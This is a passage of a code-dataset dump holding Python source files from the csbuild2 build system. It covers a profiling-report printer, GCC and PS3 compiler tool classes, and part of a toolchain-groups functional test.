max(SharedLocals.maxIncMean, reportIncMean)\n\t\t\t\t\t\t\tSharedLocals.maxExcMax = max(SharedLocals.maxExcMax, reportEntry[Position.MaxExc])\n\t\t\t\t\t\t\tSharedLocals.maxIncMax = max(SharedLocals.maxIncMax, reportEntry[Position.MaxInc])\n\t\t\t\t\t\t\tSharedLocals.maxExcMin = max(SharedLocals.maxExcMin, reportEntry[Position.MinExc])\n\t\t\t\t\t\t\tSharedLocals.maxIncMin = max(SharedLocals.maxIncMin, reportEntry[Position.MinInc])\n\n\t\t\t\t\t\t\tf.write(\"\\t\" * (indent+2))\n\t\t\t\t\t\t\tf.write(\"[\")\n\t\t\t\t\t\t\tprinted.add(key)\n\t\t\t\t\t\t\t_recurseHtml(report, sortedKeys, key + \"::\", printed, itemfmt, indent + 2)\n\t\t\t\t\t\t\tfirst = False\n\t\t\t\t\tif not first:\n\t\t\t\t\t\tf.write(\"\\t\" * (indent+1))\n\t\t\t\t\t\tf.write(\"]\\n\")\n\t\t\t\t\t\tf.write(\"\\t\" * indent)\n\t\t\t\t\tf.write(\"]\\n\")\n\n\t\t\t\tdef _printReportHtml(report, threadId):\n\t\t\t\t\tif not report:\n\t\t\t\t\t\treturn\n\t\t\t\t\ttotalcount = 0\n\t\t\t\t\tfor key in report:\n\t\t\t\t\t\ttotalcount += report[key][Position.Count]\n\n\t\t\t\t\tsortedKeys = sorted(report, reverse=True, key=lambda x: report[x][0] if reportMode == ReportMode.TREE else report[x][1])\n\n\t\t\t\t\tthreadScriptId = threadId.replace(\" \", \"_\")\n\t\t\t\t\tf.write(_blocks[0].format(threadScriptId, threadId))\n\n\t\t\t\t\tf.write(\"\\t\\t\\t\\t\\t\\t['<{}_root>', null, 0, 0 ],\\n\".format(threadScriptId))\n\t\t\t\t\tfor key in sortedKeys:\n\t\t\t\t\t\tparent, _, thisKey = key.rpartition(\"::\")\n\t\t\t\t\t\tident = _getIdentifier(key)\n\t\t\t\t\t\tf.write(\"\\t\\t\\t\\t\\t\\t['\" + ident + \"', \")\n\t\t\t\t\t\tif parent:\n\t\t\t\t\t\t\tf.write(\"'\" + _getIdentifier(parent) + \"', \")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tf.write(\"'<{}_root>',\".format(threadScriptId))\n\t\t\t\t\t\tf.write(str(report[key][0]))\n\t\t\t\t\t\tf.write(\", \")\n\t\t\t\t\t\tf.write(str(report[key][0]))\n\t\t\t\t\t\tf.write(\"],\\n\")\n\n\t\t\t\t\t\texclusiveIdent = _getIdentifier(key + \"::<\" +thisKey + \">\")\n\t\t\t\t\t\tf.write(\"\\t\\t\\t\\t\\t\\t['\" + exclusiveIdent + \"', \")\n\t\t\t\t\t\tf.write(\"'\" + ident + \"', \")\n\t\t\t\t\t\tf.write(str(max(report[key][1], 0.0000000001)))\n\t\t\t\t\t\tf.write(\", \")\n\t\t\t\t\t\tf.write(str(max(report[key][1], 0.0000000001)))\n\t\t\t\t\t\tf.write(\"],\\n\")\n\n\t\t\t\t\tf.write(_blocks[1].format(threadScriptId, threadId))\n\n\t\t\t\t\titemfmt = \"[ \\\"{}\\\", {}, {}, {}, {}, {}, {}, {}, {}, {},\\n\"\n\t\t\t\t\tprinted = set()\n\t\t\t\t\tfirst = True\n\t\t\t\t\tfor key in sortedKeys:\n\t\t\t\t\t\treportEntry = report[key]\n\t\t\t\t\t\treportIncMean = reportEntry[Position.Inclusive] / reportEntry[Position.Count]\n\t\t\t\t\t\treportExcMean = reportEntry[Position.Exclusive] / reportEntry[Position.Count]\n\n\t\t\t\t\t\tif key in printed:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tif key.find(\"::\") != -1:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tif not first:\n\t\t\t\t\t\t\tf.write(\"\\t\\t\\t\\t\\t],\\n\")\n\t\t\t\t\t\tf.write(\"\\t\\t\\t\\t\\t\")\n\t\t\t\t\t\tf.write(\n\t\t\t\t\t\t\titemfmt.format(\n\t\t\t\t\t\t\t\tkey,\n\t\t\t\t\t\t\t\treportEntry[Position.Inclusive],\n\t\t\t\t\t\t\t\treportEntry[Position.Exclusive],\n\t\t\t\t\t\t\t\treportEntry[Position.Count],\n\t\t\t\t\t\t\t\treportEntry[Position.MaxInc],\n\t\t\t\t\t\t\t\treportEntry[Position.MinInc],\n\t\t\t\t\t\t\t\treportIncMean,\n\t\t\t\t\t\t\t\treportEntry[Position.MaxExc],\n\t\t\t\t\t\t\t\treportEntry[Position.MinExc],\n\t\t\t\t\t\t\t\treportExcMean,\n\t\t\t\t\t\t\t)\n\t\t\t\t\t\t)\n\n\t\t\t\t\t\tSharedLocals.totalExc += reportEntry[Position.Exclusive]\n\t\t\t\t\t\tSharedLocals.totalCount += reportEntry[Position.Count]\n\t\t\t\t\t\tSharedLocals.maxExcMean = max(SharedLocals.maxExcMean, reportExcMean)\n\t\t\t\t\t\tSharedLocals.maxIncMean = max(SharedLocals.maxIncMean, reportIncMean)\n\t\t\t\t\t\tSharedLocals.maxExcMax = max(SharedLocals.maxExcMax, reportEntry[Position.MaxExc])\n\t\t\t\t\t\tSharedLocals.maxIncMax = max(SharedLocals.maxIncMax, reportEntry[Position.MaxInc])\n\t\t\t\t\t\tSharedLocals.maxExcMin = max(SharedLocals.maxExcMin, reportEntry[Position.MinExc])\n\t\t\t\t\t\tSharedLocals.maxIncMin = max(SharedLocals.maxIncMin, reportEntry[Position.MinInc])\n\t\t\t\t\t\tf.write(\"\\t\\t\\t\\t\\t\\t[\")\n\n\t\t\t\t\t\t_recurseHtml(report, sortedKeys, key + \"::\", printed, itemfmt, 6)\n\t\t\t\t\t\tfirst = False\n\n\t\t\t\t\tf.write(\n\t\t\t\t\t\t\"\\t\\t\\t\\t\\t]\"\n\t\t\t\t\t\t\"\\n\\t\\t\\t\\t]\"\n\t\t\t\t\t)\n\t\t\t\t\tf.write(\"\\n\\t\\t\\t\\tvar totals_{} = [{}, {}, {}, {}, {}, {}, {}, {}]\\n\".format(\n\t\t\t\t\t\tthreadScriptId, SharedLocals.totalExc, SharedLocals.totalCount,\n\t\t\t\t\t\tSharedLocals.maxIncMax, SharedLocals.maxIncMin, SharedLocals.maxIncMean,\n\t\t\t\t\t\tSharedLocals.maxExcMax, SharedLocals.maxExcMin, SharedLocals.maxExcMean,\n\t\t\t\t\t))\n\t\t\t\t\tf.write(_blocks[2].format(threadScriptId, threadId))\n\n\t\t\t\tf.write(_htmlHeader.format(os.path.basename(sys.modules[\"__main__\"].__file__)))\n\n\t\t\t\tfor threadId, report in threadreports.items():\n\t\t\t\t\tif threadId == threading.current_thread().ident:\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t_printReportHtml(report, \"Worker Thread {}\".format(threadId))\n\n\t\t\t\t_printReportHtml(threadreports[threading.current_thread().ident], \"Main Thread\")\n\t\t\t\tif len(threadreports) != 1:\n\t\t\t\t\t_printReportHtml(fullreport, \"CUMULATIVE\")\n\n\t\t\t\tf.write(_htmlFooter)\n\n\t\telse:\n\t\t\tif output is None:\n\t\t\t\t#pylint: disable=invalid-name,missing-docstring\n\t\t\t\tdef printIt(*args, **kwargs):\n\t\t\t\t\tprint(*args, **kwargs)\n\t\t\t\toutput = printIt\n\t\t\toutput(\"Perf reports:\")\n\n\t\t\tdef _recurse(report, sortedKeys, prefix, replacementText, printed, itemfmt):\n\t\t\t\tprev = (None, None)\n\n\t\t\t\tfor key in sortedKeys:\n\t\t\t\t\tif key in printed:\n\t\t\t\t\t\tcontinue\n\n\t\t\t\t\tif key.startswith(prefix):\n\t\t\t\t\t\tprintkey = key.replace(prefix, replacementText, 1)\n\t\t\t\t\t\tif printkey.find(\"::\") != -1:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\tif prev != (None, None):\n\t\t\t\t\t\t\treportEntry = report[prev[1]]\n\t\t\t\t\t\t\treportIncMean = reportEntry[Position.Inclusive] / reportEntry[Position.Count]\n\t\t\t\t\t\t\treportExcMean = reportEntry[Position.Exclusive] / reportEntry[Position.Count]\n\t\t\t\t\t\t\toutput(\n\t\t\t\t\t\t\t\titemfmt.format(\n\t\t\t\t\t\t\t\t\tprev[0],\n\t\t\t\t\t\t\t\t\t_formatTime(reportEntry[Position.Inclusive]),\n\t\t\t\t\t\t\t\t\t_formatTime(reportEntry[Position.Exclusive]),\n\t\t\t\t\t\t\t\t\treportEntry[Position.Count],\n\t\t\t\t\t\t\t\t\t_formatTime(reportEntry[Position.MinInc]),\n\t\t\t\t\t\t\t\t\t_formatTime(reportEntry[Position.MaxInc]),\n\t\t\t\t\t\t\t\t\t_formatTime(reportIncMean),\n\t\t\t\t\t\t\t\t\t_formatTime(reportEntry[Position.MinExc]),\n\t\t\t\t\t\t\t\t\t_formatTime(reportEntry[Position.MaxExc]),\n\t\t\t\t\t\t\t\t\t_formatTime(reportExcMean),\n\t\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\t)\n\t\t\t\t\t\t\tprinted.add(prev[1])\n\t\t\t\t\t\t\t_recurse(report, sortedKeys, prev[1] + \"::\", replacementText[:-4] + \" \\u2502 \" + \" \\u251c\\u2500 \", printed, itemfmt)\n\t\t\t\t\t\tprev = (printkey, key)\n\n\t\t\t\tif prev != (None, None):\n\t\t\t\t\tprintkey = prev[0].replace(\"\\u251c\", \"\\u2514\")\n\t\t\t\t\treportEntry = report[prev[1]]\n\t\t\t\t\treportIncMean = reportEntry[Position.Inclusive] / reportEntry[Position.Count]\n\t\t\t\t\treportExcMean = reportEntry[Position.Exclusive] / reportEntry[Position.Count]\n\t\t\t\t\toutput(\n\t\t\t\t\t\titemfmt.format(\n\t\t\t\t\t\t\tprintkey,\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.Inclusive]),\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.Exclusive]),\n\t\t\t\t\t\t\treportEntry[Position.Count],\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.MinInc]),\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.MaxInc]),\n\t\t\t\t\t\t\t_formatTime(reportIncMean),\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.MinExc]),\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.MaxExc]),\n\t\t\t\t\t\t\t_formatTime(reportExcMean),\n\t\t\t\t\t\t)\n\t\t\t\t\t)\n\t\t\t\t\tprinted.add(prev[1])\n\t\t\t\t\t_recurse(report, sortedKeys, prev[1] + \"::\", replacementText[:-4] + \" \" + \" \\u251c\\u2500 \", printed, itemfmt)\n\n\t\t\tdef _alteredKey(key):\n\t\t\t\treturn re.sub(\"([^:]*::)\", \" \", key)\n\n\t\t\tdef _printReport(report, threadId):\n\t\t\t\tif not report:\n\t\t\t\t\treturn\n\n\t\t\t\tmaxlen = len(str(threadId))\n\t\t\t\ttotalcount = 0\n\t\t\t\tfor key in report:\n\t\t\t\t\tmaxlen = max(len(_alteredKey(key)), maxlen)\n\t\t\t\t\ttotalcount += report[key][2]\n\n\t\t\t\toutput(\"\")\n\t\t\t\tlinefmt = \"+={{:=<{}}}=+============+============+===========+============+============+============+============+============+============+\".format(maxlen)\n\t\t\t\tline = linefmt.format('')\n\t\t\t\toutput(line)\n\t\t\t\theaderfmt = \"| {{:<{}}} | INCLUSIVE | EXCLUSIVE | CALLS | INC_MIN | INC_MAX | INC_MEAN | EXC_MIN | EXC_MAX | EXC_MEAN |\".format(maxlen)\n\t\t\t\toutput(headerfmt.format(threadId))\n\t\t\t\toutput(line)\n\t\t\t\titemfmt = \"| {{:{}}} | {{:>10}} | {{:>10}} | {{:>9}} | {{:>10}} | {{:>10}} | {{:>10}} | {{:>10}} | {{:>10}} | {{:>10}} |\".format(maxlen)\n\t\t\t\tprinted = set()\n\t\t\t\tsortedKeys = sorted(report, reverse=True, key=lambda x: report[x][0] if reportMode == ReportMode.TREE else report[x][1])\n\t\t\t\ttotal = 0\n\t\t\t\tfor key in sortedKeys:\n\t\t\t\t\tif key in printed:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif key.find(\"::\") != -1:\n\t\t\t\t\t\tcontinue\n\t\t\t\t\treportEntry = report[key]\n\t\t\t\t\toutput(\n\t\t\t\t\t\titemfmt.format(\n\t\t\t\t\t\t\tkey,\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.Inclusive]),\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.Exclusive]),\n\t\t\t\t\t\t\treportEntry[Position.Count],\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.MinInc]),\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.MaxInc]),\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.Inclusive] / report[key][Position.Count]),\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.MinExc]),\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.MaxExc]),\n\t\t\t\t\t\t\t_formatTime(reportEntry[Position.Exclusive] / report[key][Position.Count]),\n\t\t\t\t\t\t)\n\t\t\t\t\t)\n\t\t\t\t\tif reportMode == ReportMode.FLAT:\n\t\t\t\t\t\ttotal += reportEntry[Position.Exclusive]\n\t\t\t\t\telse:\n\t\t\t\t\t\ttotal += reportEntry[Position.Inclusive]\n\t\t\t\t\t_recurse(report, sortedKeys, key + \"::\", \" \\u251c\\u2500 \", printed, itemfmt)\n\n\t\t\t\toutput(line)\n\n\t\t\tfor threadId, report in threadreports.items():\n\t\t\t\tif threadId == threading.current_thread().ident:\n\t\t\t\t\tcontinue\n\n\t\t\t\t_printReport(report, \"Worker Thread {}\".format(threadId))\n\n\t\t\t_printReport(threadreports[threading.current_thread().ident], \"Main Thread\")\n\t\t\tif len(threadreports) != 1:\n\t\t\t\t_printReport(fullreport, \"CUMULATIVE\")\n" }, { "alpha_fraction": 0.6542056202888489, "alphanum_fraction": 0.6585802435874939, "avg_line_length": 33.92361068725586, "blob_id": "9724717d5d056501118282f8d71c6280546ad3a2", "content_id": "73d891b6ee3ce79271f457e84318b166f1b2047e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5029, "license_type": "no_license", "max_line_length": 121, "num_lines": 144, "path": "/csbuild/tools/cpp_compilers/gcc_cpp_compiler.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: gcc_cpp_compiler\n\t:synopsis: gcc compiler tool for C++\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\n\nimport csbuild\n\nfrom .cpp_compiler_base import CppCompilerBase\nfrom ..common.tool_traits import HasDebugLevel, HasOptimizationLevel\nfrom ... import log\nfrom ..._utils import response_file, shared_globals\n\nDebugLevel = HasDebugLevel.DebugLevel\nOptimizationLevel = HasOptimizationLevel.OptimizationLevel\n\ndef _ignore(_):\n\tpass\n\nclass GccCppCompiler(CppCompilerBase):\n\t\"\"\"\n\tGCC compiler implementation\n\t\"\"\"\n\tsupportedArchitectures = {\"x86\", \"x64\", \"arm\", \"arm64\"}\n\toutputFiles = {\".o\"}\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef _getOutputFiles(self, project, inputFile):\n\t\tintDirPath = project.GetIntermediateDirectory(inputFile)\n\t\tfilename = os.path.splitext(os.path.basename(inputFile.filename))[0] + \".o\"\n\t\treturn tuple({ os.path.join(intDirPath, filename) })\n\n\tdef _getCommand(self, project, inputFile, isCpp):\n\t\tcmdExe = self._getComplierName(project, isCpp)\n\t\tcmd = self._getDefaultArgs(project) \\\n\t\t\t+ self._getCustomArgs(project, isCpp) \\\n\t\t\t+ self._getArchitectureArgs(project) \\\n\t\t\t+ self._getOptimizationArgs() \\\n\t\t\t+ self._getDebugArgs() \\\n\t\t\t+ self._getSystemArgs(project, isCpp) \\\n\t\t\t+ self._getLanguageStandardArgs(isCpp) \\\n\t\t\t+ self._getPreprocessorArgs() \\\n\t\t\t+ self._getIncludeDirectoryArgs() \\\n\t\t\t+ self._getOutputFileArgs(project, inputFile) \\\n\t\t\t+ self._getInputFileArgs(inputFile)\n\n\t\tinputFileBasename = os.path.basename(inputFile.filename)\n\t\tresponseFile = response_file.ResponseFile(project, \"{}-{}\".format(inputFile.uniqueDirectoryId, inputFileBasename), cmd)\n\n\t\tif shared_globals.showCommands:\n\t\t\tlog.Command(\"ResponseFile: {}\\n\\t{}\".format(responseFile.filePath, responseFile.AsString()))\n\n\t\treturn [cmdExe, \"@{}\".format(responseFile.filePath)]\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getComplierName(self, project, isCpp):\n\t\t_ignore(project)\n\t\treturn \"g++\" if isCpp else \"gcc\"\n\n\tdef _getDefaultArgs(self, project):\n\t\targs = [\"--pass-exit-codes\"]\n\t\tif project.projectType == csbuild.ProjectType.SharedLibrary:\n\t\t\targs.append(\"-fPIC\")\n\t\treturn args\n\n\tdef _getCustomArgs(self, project, isCpp):\n\t\t_ignore(project)\n\t\treturn self._globalFlags + (self._cxxFlags if isCpp else self._cFlags)\n\n\tdef _getInputFileArgs(self, inputFile):\n\t\treturn [\"-c\", inputFile.filename]\n\n\tdef _getOutputFileArgs(self, project, inputFile):\n\t\toutputFiles = self._getOutputFiles(project, inputFile)\n\t\treturn [\"-o\", outputFiles[0]]\n\n\tdef _getPreprocessorArgs(self):\n\t\treturn [\"-D{}\".format(d) for d in self._defines] + [\"-U{}\".format(u) for u in self._undefines]\n\n\tdef _getIncludeDirectoryArgs(self):\n\t\treturn [\"-I{}\".format(d) for d in self._includeDirectories]\n\n\tdef _getDebugArgs(self):\n\t\tif self._debugLevel != DebugLevel.Disabled:\n\t\t\treturn [\"-g\"]\n\t\treturn []\n\n\tdef _getOptimizationArgs(self):\n\t\targ = {\n\t\t\tOptimizationLevel.Size: \"s\",\n\t\t\tOptimizationLevel.Speed: \"fast\",\n\t\t\tOptimizationLevel.Max: \"3\",\n\t\t}\n\t\treturn [\"-O{}\".format(arg.get(self._optLevel, \"0\"))]\n\n\tdef _getArchitectureArgs(self, project):\n\t\targs = {\n\t\t\t\"x86\": [\"-m32\"],\n\t\t\t\"x64\": [\"-m64\"],\n\t\t}.get(project.architectureName, [])\n\t\treturn args\n\n\tdef _getSystemArgs(self, project, isCpp):\n\t\t_ignore(project)\n\t\t_ignore(isCpp)\n\t\treturn []\n\n\tdef _getLanguageStandardArgs(self, isSourceCpp):\n\t\tstandard = self._cxxStandard if isSourceCpp else self._ccStandard\n\t\targ = \"-std={}\".format(standard) if standard else None\n\t\treturn [arg]\n" }, { "alpha_fraction": 0.6684373021125793, "alphanum_fraction": 0.6758053302764893, "avg_line_length": 37.14379119873047, "blob_id": "fbe6939765f7923cbeea4cc07836d0982197c4fe", "content_id": "bf8b08576a5130ec95bb8b96a1fb905a32f448d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5836, "license_type": "no_license", "max_line_length": 121, "num_lines": 153, "path": "/csbuild/tools/cpp_compilers/ps3_cpp_compiler.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: ps3_cpp_compiler\n\t:synopsis: Implementation of the PS3 C/C++ compiler tool.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport os\n\nfrom .cpp_compiler_base import CppCompilerBase\n\nfrom ..common.sony_tool_base import Ps3BaseTool, Ps3ProjectType, Ps3ToolsetType\nfrom ..common.tool_traits import HasDebugLevel, HasOptimizationLevel\nfrom ... import log\nfrom ..._utils import response_file, shared_globals\n\nDebugLevel = HasDebugLevel.DebugLevel\nOptimizationLevel = HasOptimizationLevel.OptimizationLevel\n\nclass Ps3CppCompiler(Ps3BaseTool, CppCompilerBase):\n\t\"\"\"\n\tPS3 C/C++ compiler tool implementation.\n\t\"\"\"\n\tsupportedPlatforms = { \"Windows\" }\n\tsupportedArchitectures = { \"cell\" }\n\toutputFiles = { \".o\" }\n\n\tdef __init__(self, projectSettings):\n\t\tPs3BaseTool.__init__(self, projectSettings)\n\t\tCppCompilerBase.__init__(self, projectSettings)\n\n\t\tself._compilerExeName = None\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tPs3BaseTool.SetupForProject(self, project)\n\t\tCppCompilerBase.SetupForProject(self, project)\n\n\t\tself._compilerExeName = {\n\t\t\tPs3ToolsetType.PpuSnc: (\"ps3ppusnc.exe\", \"ps3ppusnc.exe\"),\n\t\t\tPs3ToolsetType.PpuGcc: (\"ppu-lv2-gcc.exe\", \"ppu-lv2-g++.exe\"),\n\t\t\tPs3ToolsetType.Spu: (\"spu-lv2-gcc.exe\", \"spu-lv2-g++.exe\"),\n\t\t}.get(self._ps3BuildInfo.toolsetType, None)\n\t\tassert self._compilerExeName, \"Invalid PS3 toolset type: {}\".format(self._ps3BuildInfo.toolsetType)\n\n\tdef _getOutputFiles(self, project, inputFile):\n\t\tintDirPath = project.GetIntermediateDirectory(inputFile)\n\t\tfilename = os.path.splitext(os.path.basename(inputFile.filename))[0] + \".o\"\n\t\treturn tuple({ os.path.join(intDirPath, filename) })\n\n\tdef _getCommand(self, project, inputFile, isCpp):\n\t\tcmdExe = self._getComplierName(isCpp)\n\t\tcmd = self._getCustomArgs(isCpp) \\\n\t\t\t+ self._getOptimizationArgs() \\\n\t\t\t+ self._getDebugArgs() \\\n\t\t\t+ self._getLanguageStandardArgs(isCpp) \\\n\t\t\t+ self._getPreprocessorArgs(project) \\\n\t\t\t+ self._getIncludeDirectoryArgs() \\\n\t\t\t+ self._getOutputFileArgs(project, inputFile) \\\n\t\t\t+ self._getInputFileArgs(inputFile)\n\n\t\tinputFileBasename = os.path.basename(inputFile.filename)\n\t\tresponseFile = response_file.ResponseFile(project, \"{}-{}\".format(inputFile.uniqueDirectoryId, inputFileBasename), cmd)\n\n\t\tif shared_globals.showCommands:\n\t\t\tlog.Command(\"ResponseFile: {}\\n\\t{}\".format(responseFile.filePath, responseFile.AsString()))\n\n\t\treturn [cmdExe, \"@{}\".format(responseFile.filePath)]\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getComplierName(self, isCpp):\n\t\treturn os.path.join(self._ps3SystemBinPath, self._compilerExeName[1] if isCpp else self._compilerExeName[0])\n\n\tdef _getCustomArgs(self, isCpp):\n\t\treturn self._globalFlags + self._cxxFlags if isCpp else self._cFlags\n\n\tdef _getInputFileArgs(self, inputFile):\n\t\treturn [\"-c\", inputFile.filename]\n\n\tdef _getOutputFileArgs(self, project, inputFile):\n\t\toutputFiles = self._getOutputFiles(project, inputFile)\n\t\treturn [\"-o\", outputFiles[0]]\n\n\tdef _getPreprocessorArgs(self, project):\n\t\targs = [\"-D__PS3__\"]\n\n\t\tif self._ps3BuildInfo.toolsetType != Ps3ToolsetType.Spu:\n\t\t\tif self._ps3BuildInfo.toolsetType == Ps3ToolsetType.PpuGcc:\n\t\t\t\targs.append(\"-D__GCC__\")\n\n\t\t\tif project.projectType in (Ps3ProjectType.PpuSncSharedLibrary, Ps3ProjectType.PpuGccSharedLibrary):\n\t\t\t\targs.extend([\n\t\t\t\t\t\"-DCSB_PS3_PPU_PRX_LIBNAME=cellPrx_{}\".format(project.name),\n\t\t\t\t\t\"-DCSB_PS3_PPU_PRX_STUBNAME=cellPrx_{}_stub\".format(project.name),\n\t\t\t\t])\n\n\t\targs.extend([\"-D{}\".format(d) for d in self._defines])\n\t\targs.extend([\"-U{}\".format(u) for u in self._undefines])\n\n\t\treturn args\n\n\tdef _getIncludeDirectoryArgs(self):\n\t\targs = [\"-I{}\".format(path) for path in sorted(self._includeDirectories) + self._ps3SystemIncludePaths]\n\n\t\treturn args\n\n\tdef _getDebugArgs(self):\n\t\tif self._debugLevel != DebugLevel.Disabled:\n\t\t\treturn [\"-g\"]\n\t\treturn []\n\n\tdef _getOptimizationArgs(self):\n\t\targ = {\n\t\t\tOptimizationLevel.Size: \"s\",\n\t\t\tOptimizationLevel.Speed: \"d\",\n\t\t\tOptimizationLevel.Max: \"3\",\n\t\t}\n\t\treturn [\"-O{}\".format(arg.get(self._optLevel, \"0\"))]\n\n\tdef _getLanguageStandardArgs(self, isSourceCpp):\n\t\t# No argument for the C language standard.\n\t\targ = \"-Xstd={}\".format(self._cxxStandard) if self._cxxStandard and isSourceCpp else None\n\t\treturn [arg]\n" }, { "alpha_fraction": 0.7368205785751343, "alphanum_fraction": 0.7482631802558899, "avg_line_length": 41.18965530395508, "blob_id": "e84cf1f1f24255230a60c48af5f0e58370f3c251", "content_id": "a3f4b1838ec0d9161165389cc341f9764fd2fad4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2447, "license_type": "no_license", "max_line_length": 97, "num_lines": 58, "path": "/functional_tests/toolchain_groups_test/tests.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: tests\n\t:synopsis: Test for toolchain groups\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom csbuild._testing.functional_test import FunctionalTest\n\nclass ToolchainGroupsTest(FunctionalTest):\n\t\"\"\"Toolchain groups test\"\"\"\n\t# pylint: disable=invalid-name\n\tdef runTest(self, projectName):\n\t\t\"\"\"Toolchain groups test\"\"\"\n\t\tself.assertMakeSucceeds(\"--ao\", \"-v\", \"--project\", projectName)\n\n\t\tfor i in range(1, 11):\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/AddDoubles/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/AddDoubles2/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/FirstThree/AddDoubles3/{}.second\".format(i), str(i*2))\n\t\t\tself.assertFileContents(\"./intermediate/{}.second\".format(i), str(i*2))\n\n\t\tself.assertFileContents(\"./out/Foo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/AddDoubles2/MiddleFoo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/AddDoubles3/MiddleFoo.third\", \"110\")\n\t\tself.assertFileContents(\"./out/LastThree/AddDoubles4/Foo.third\", \"110\")\n\n\t\tself.cleanArgs = 